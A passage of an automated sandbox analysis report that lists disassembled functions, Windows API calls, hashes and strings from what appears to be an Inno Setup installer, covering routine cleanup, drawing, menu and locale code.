                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileProcess$CloseDeleteHandleLocalMessageObjectOpenSendSingleSleepThreadTimeWaitWindow
                                                                                  • String ID: Deleting Uninstall data files.
                                                                                  • API String ID: 2572021473-2568741658
                                                                                  • Opcode ID: 4b2f6f2266b213e188e09575952d37da05d58bf78dc32b2efb95225bf49787bc
                                                                                  • Instruction ID: 5b36fd985f99126c74a10589035b45e6a30ddc0ed27195c476cc5962d67b8188
                                                                                  • Opcode Fuzzy Hash: 4b2f6f2266b213e188e09575952d37da05d58bf78dc32b2efb95225bf49787bc
                                                                                  • Instruction Fuzzy Hash: 00216270304600AAE711FBAAEC42B6E37D8E745719F504D3FBA00E62E2D6789C448B1C
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0048E420,00000000,00401B68), ref: 00401ABD
                                                                                  • LocalFree.KERNEL32(007A43F8,00000000,00401B68), ref: 00401ACF
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,007A43F8,00000000,00401B68), ref: 00401AEE
                                                                                  • LocalFree.KERNEL32(007A53F8,?,00000000,00008000,007A43F8,00000000,00401B68), ref: 00401B2D
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0048E420,00401B6F), ref: 00401B58
                                                                                  • RtlDeleteCriticalSection.KERNEL32(0048E420,00401B6F), ref: 00401B62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                  • String ID: ,Zz
                                                                                  • API String ID: 3782394904-1049774954
                                                                                  • Opcode ID: ef81c82dc6c27d1bab7654ab93ed6e8672928664b0cd156fc567f2d455e1cd45
                                                                                  • Instruction ID: b9a7f395b5d56ec18c3641e3acf04ea5f6c89d2c32274820cfad5a8b329539ec
                                                                                  • Opcode Fuzzy Hash: ef81c82dc6c27d1bab7654ab93ed6e8672928664b0cd156fc567f2d455e1cd45
                                                                                  • Instruction Fuzzy Hash: 3A116D30B003405AE711AB6BAC82B1E37A59746B0CF544C7EF50867AF2D77CA850876D
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.KERNEL32(0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • RtlEnterCriticalSection.KERNEL32(0048E420,0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0048E420,00401A89,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID: ,Zz$`H$`H
                                                                                  • API String ID: 730355536-600410407
                                                                                  • Opcode ID: c39815ea3b6721e7a5f601856eb2b25806e5d3f71a5ab1d3b81a7cf49ff40e9e
                                                                                  • Instruction ID: de161334eeecc2721a57c90ad54620e8788a626888772cff6321a1bfd4cfdd1e
                                                                                  • Opcode Fuzzy Hash: c39815ea3b6721e7a5f601856eb2b25806e5d3f71a5ab1d3b81a7cf49ff40e9e
                                                                                  • Instruction Fuzzy Hash: 21018070A442505EF319BB6B981672D3AD4D74AB48F518C7FF408A6AF2C7BC4840CB6D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,00456D1A,?,00000000,?,00000000), ref: 00456C5E
                                                                                    • Part of subcall function 004521A8: FindClose.KERNEL32(000000FF,0045229E), ref: 0045228D
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  Strings
                                                                                  • Stripped read-only attribute., xrefs: 00456C20
                                                                                  • Failed to delete directory (%d)., xrefs: 00456CF4
                                                                                  • Deleting directory: %s, xrefs: 00456BE7
                                                                                  • Failed to strip read-only attribute., xrefs: 00456C2C
                                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00456C38
                                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00456CD3
                                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 00456C77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseErrorFindLastLocalTime
                                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                  • API String ID: 3419951142-1448842058
                                                                                  • Opcode ID: 12d1fa9fd4fac157bd2f35f47c99db0dc299c30442b6f0c2602930e4e3c2b3dd
                                                                                  • Instruction ID: 612685d8fbd369c3feb94a21bfaa039c8fbd1ca1b50be6f3f0b9ae10508e3f84
                                                                                  • Opcode Fuzzy Hash: 12d1fa9fd4fac157bd2f35f47c99db0dc299c30442b6f0c2602930e4e3c2b3dd
                                                                                  • Instruction Fuzzy Hash: 8A41B730B002049ADB11DB6984027AE77B5AF8931AF92897BAC41A7393DB7C8D0DC75D
                                                                                  APIs
                                                                                  • GetCapture.USER32 ref: 00422E1C
                                                                                  • GetCapture.USER32 ref: 00422E2B
                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E31
                                                                                  • ReleaseCapture.USER32 ref: 00422E36
                                                                                  • GetActiveWindow.USER32 ref: 00422E45
                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EC4
                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F28
                                                                                  • GetActiveWindow.USER32 ref: 00422F37
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                  • String ID:
                                                                                  • API String ID: 862346643-0
                                                                                  • Opcode ID: 2e7ca65df4159c9181e9ae45493a8cf6f188c116acded5f45146c07519b13a46
                                                                                  • Instruction ID: 7310def28d5f47dc23986a288bc6a00c4b1087494dc06655299f01bf64781908
                                                                                  • Opcode Fuzzy Hash: 2e7ca65df4159c9181e9ae45493a8cf6f188c116acded5f45146c07519b13a46
                                                                                  • Instruction Fuzzy Hash: 7F413670B00254AFD710EB6ADA45B9E77F1EF04304F9544BAF544AB392D7B89E40DB18
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000), ref: 00429402
                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 0042940B
                                                                                    • Part of subcall function 0041A160: CreateFontIndirectA.GDI32(?), ref: 0041A21F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0042941A
                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00429427
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0042942E
                                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00429436
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 0042945B
                                                                                  • GetSystemMetrics.USER32(00000006), ref: 00429475
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                  • String ID:
                                                                                  • API String ID: 361401722-0
                                                                                  • Opcode ID: 76df18a572ff36c12c1b537becbc051ccd199627b54ae8c57dddbb5f6b5a8e02
                                                                                  • Instruction ID: d0d42057a0529907f9013eda7cff86a146a35969fb8ff3905868e9cbcb7072c6
                                                                                  • Opcode Fuzzy Hash: 76df18a572ff36c12c1b537becbc051ccd199627b54ae8c57dddbb5f6b5a8e02
                                                                                  • Instruction Fuzzy Hash: 8A01C4917087106BF310B6B69CC2B6F66D8DB84358F84053FFA469A3D3D56C9C41876E
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,?,00418FD1,0048BF7D), ref: 0041DD9F
                                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,?,00418FD1,0048BF7D), ref: 0041DDA9
                                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FD1,0048BF7D), ref: 0041DDB6
                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDC5
                                                                                  • GetStockObject.GDI32(00000007), ref: 0041DDD3
                                                                                  • GetStockObject.GDI32(00000005), ref: 0041DDDF
                                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DDEB
                                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DDFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectStock$A24620A480A570IconLoad
                                                                                  • String ID:
                                                                                  • API String ID: 3573811560-0
                                                                                  • Opcode ID: 234ace20534a483247cdeec0bc4b33302f7183803a42a3338c6c13fa89dd1da1
                                                                                  • Instruction ID: 82ac1f55ca88f42241401a77f4d9bcce69c8575cf3ee4bb72d0fa6b1f283daaf
                                                                                  • Opcode Fuzzy Hash: 234ace20534a483247cdeec0bc4b33302f7183803a42a3338c6c13fa89dd1da1
                                                                                  • Instruction Fuzzy Hash: 4F1130B06443415AE740FF7A5C9679E2690DB64708F40883FF605BF3D2EB7A18448B6E
                                                                                  APIs
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0045D36C
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02), ref: 0045D372
                                                                                  • SetCursor.USER32(00000000,0045D63E,00007F02), ref: 0045D3C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load
                                                                                  • String ID: $ $@
                                                                                  • API String ID: 1675784387-2546599590
                                                                                  • Opcode ID: 7644e416e00ba9e2f22b00fd754017ec5ea57ca4f7e263f3f4ba39f927a872ba
                                                                                  • Instruction ID: edeb7ffa061c20c96bcea1208362ad82e0d1c07cea2dea55ed1db15e12419eb7
                                                                                  • Opcode Fuzzy Hash: 7644e416e00ba9e2f22b00fd754017ec5ea57ca4f7e263f3f4ba39f927a872ba
                                                                                  • Instruction Fuzzy Hash: 5AC18030A002449FD730DF69C585A9EBBF1AF05305F54856AEC45AB7A3CB78ED4ACB14
                                                                                  APIs
                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00451BEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                  • API String ID: 390214022-3304407042
                                                                                  • Opcode ID: da114af480cc29c5880972c122bcbbfc498d2490fd72fe9129373e553a90f005
                                                                                  • Instruction ID: 03374803da85292de176326ac7aea2e8828ebe5a3fdc2e3f4ac0284eb6c620c0
                                                                                  • Opcode Fuzzy Hash: da114af480cc29c5880972c122bcbbfc498d2490fd72fe9129373e553a90f005
                                                                                  • Instruction Fuzzy Hash: 4F910534A002499BDF01EFA5D882BDEB7B5EF44305F508576EC00B72A2D779AE49CA58
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004088EC,?,?,?,?,00000000,00000000,00000000,?,004098F3,00000000,00409906), ref: 004086BE
                                                                                    • Part of subcall function 004084EC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048E4C0,00000001,?,004085B7,?,00000000,00408696), ref: 0040850A
                                                                                    • Part of subcall function 00408538: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040873A,?,?,?,00000000,004088EC), ref: 0040854B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 1044490935-665933166
                                                                                  • Opcode ID: 3b9548b66310813e5d57eb75e46bfa92d3e500fd9e84c26cef7135e1b5631621
                                                                                  • Instruction ID: 461d50fe5e10e7c487a8a2036d5b15bd32eef00e95e09dab194cd53b86f4fb1a
                                                                                  • Opcode Fuzzy Hash: 3b9548b66310813e5d57eb75e46bfa92d3e500fd9e84c26cef7135e1b5631621
                                                                                  • Instruction Fuzzy Hash: 5C516F74B001486BD701FBA69981A9E776ADB88304F50C47FB185BB7C6DE3CCA05971D
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(00000000,00411871), ref: 00411704
                                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117C2
                                                                                    • Part of subcall function 00411A24: CreatePopupMenu.USER32 ref: 00411A3E
                                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0041184E
                                                                                    • Part of subcall function 00411A24: CreateMenu.USER32 ref: 00411A48
                                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411835
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                  • String ID: ,$?
                                                                                  • API String ID: 2359071979-2308483597
                                                                                  • Opcode ID: 2d44dabe907c3e26e302f8676afd08694a877892a09dfb0dd50d9084719ecee0
                                                                                  • Instruction ID: 057aadcbeec77304816a0ae5eb6214e2fda00e6ec5d9f2306224d9003220c01f
                                                                                  • Opcode Fuzzy Hash: 2d44dabe907c3e26e302f8676afd08694a877892a09dfb0dd50d9084719ecee0
                                                                                  • Instruction Fuzzy Hash: 8F510574A001049BDB10EF7ADC816EE7BF5AF09314B15857AFA04E73A2D738DD418B58
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA0
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BEAF
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF00
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF0E
                                                                                  • DeleteObject.GDI32(?), ref: 0041BF17
                                                                                  • DeleteObject.GDI32(?), ref: 0041BF20
                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                  • String ID:
                                                                                  • API String ID: 1030595962-0
                                                                                  • Opcode ID: a153ab393487465a8da4342af3d3b9fe427b39ec914a9fedc17fb92f482ab86c
                                                                                  • Instruction ID: 230c253f90bd36dc6b741b165a7fc74760c502a5dd92b35b9b209c24b9a6499e
                                                                                  • Opcode Fuzzy Hash: a153ab393487465a8da4342af3d3b9fe427b39ec914a9fedc17fb92f482ab86c
                                                                                  • Instruction Fuzzy Hash: C2512575E00219AFCB14DFA9D8819EEB7F9EF48314B10846AF904E7391D738AD81CB64
                                                                                  APIs
                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE76
                                                                                  • 73A24620.GDI32(00000000,00000026), ref: 0041CE95
                                                                                  • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEFB
                                                                                  • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF0A
                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF74
                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFB2
                                                                                  • 73A18830.GDI32(?,?,00000001,0041CFE4,00000000,00000026), ref: 0041CFD7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Stretch$A18830$A122A24620BitsMode
                                                                                  • String ID:
                                                                                  • API String ID: 430401518-0
                                                                                  • Opcode ID: c029e725cd9f6403e11893460a0a6907faf85afa5677299bd909d31d509818c0
                                                                                  • Instruction ID: 94cc35811525f10165872661934a11db1789f6d673efb4e59a63692bba8fb4eb
                                                                                  • Opcode Fuzzy Hash: c029e725cd9f6403e11893460a0a6907faf85afa5677299bd909d31d509818c0
                                                                                  • Instruction Fuzzy Hash: 92513D71640600AFDB14DFA8CD85F9BBBE9AF08304F14845AB545DB292C778ED81CB58
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 004545D6
                                                                                    • Part of subcall function 004241F4: GetWindowTextA.USER32(?,?,00000100), ref: 00424214
                                                                                    • Part of subcall function 0041EE1C: GetCurrentThreadId.KERNEL32 ref: 0041EE6B
                                                                                    • Part of subcall function 0041EE1C: 73A25940.USER32(00000000,0041EDCC,00000000,00000000,0041EE88,?,00000000,0041EEBF,?,?,?,00000000), ref: 0041EE71
                                                                                    • Part of subcall function 0042423C: SetWindowTextA.USER32(?,00000000), ref: 00424254
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045463D
                                                                                  • TranslateMessage.USER32(?), ref: 0045465B
                                                                                  • DispatchMessageA.USER32(?), ref: 00454664
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                                  • String ID: [Paused]
                                                                                  • API String ID: 3047529653-4230553315
                                                                                  • Opcode ID: 51f502c09367ad519057eb33993c8c6ed6a9fb97b862332b7dee7f663e720acf
                                                                                  • Instruction ID: 31323deeb3eb4a9f01f853771ba354514d9081808b563571db15092b4fe3e38e
                                                                                  • Opcode Fuzzy Hash: 51f502c09367ad519057eb33993c8c6ed6a9fb97b862332b7dee7f663e720acf
                                                                                  • Instruction Fuzzy Hash: CD3119309042486EDB01DBB6DC41BDE7BF8EB8A308F55447BE800E7292D37C9989C769
                                                                                  APIs
                                                                                  • GetCursor.USER32(00000000,004648F7), ref: 00464874
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00464882
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,004648F7), ref: 00464888
                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,004648F7), ref: 00464892
                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,004648F7), ref: 00464898
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LoadSleep
                                                                                  • String ID: CheckPassword
                                                                                  • API String ID: 4023313301-1302249611
                                                                                  • Opcode ID: a65dbfe2ee4818d3f3000be4293fe6eec2c9ef1fce4dfb786bf21c71eded93e8
                                                                                  • Instruction ID: 4252fdebe47f36716c4edd0621c6b588287af85fed6259fbf230cbebb08b59d9
                                                                                  • Opcode Fuzzy Hash: a65dbfe2ee4818d3f3000be4293fe6eec2c9ef1fce4dfb786bf21c71eded93e8
                                                                                  • Instruction Fuzzy Hash: 0D31E734640244AFDB00EF69C889F9E7BE0EF45304F4580BAB8049B3A2D7389E44CB59
                                                                                  APIs
                                                                                    • Part of subcall function 0041BFC0: GetObjectA.GDI32(?,00000018), ref: 0041BFCD
                                                                                  • GetFocus.USER32 ref: 0041C0E0
                                                                                  • 73A1A570.USER32(?), ref: 0041C0EC
                                                                                  • 73A18830.GDI32(?,?,00000000,00000000,0041C16B,?,?), ref: 0041C10D
                                                                                  • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C16B,?,?), ref: 0041C119
                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C130
                                                                                  • 73A18830.GDI32(?,00000000,00000000,0041C172,?,?), ref: 0041C158
                                                                                  • 73A1A480.USER32(?,?,0041C172,?,?), ref: 0041C165
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A18830$A122A480A570BitsFocusObject
                                                                                  • String ID:
                                                                                  • API String ID: 2231653193-0
                                                                                  • Opcode ID: 48eb8456167fe97d013b11fbb1450f0e08a81d06118482c85d5c9839bfbf6c47
                                                                                  • Instruction ID: 44ccde68e7ae1fcf954d85518630396d9bbce719c3541842e88b9ea3f37fe78c
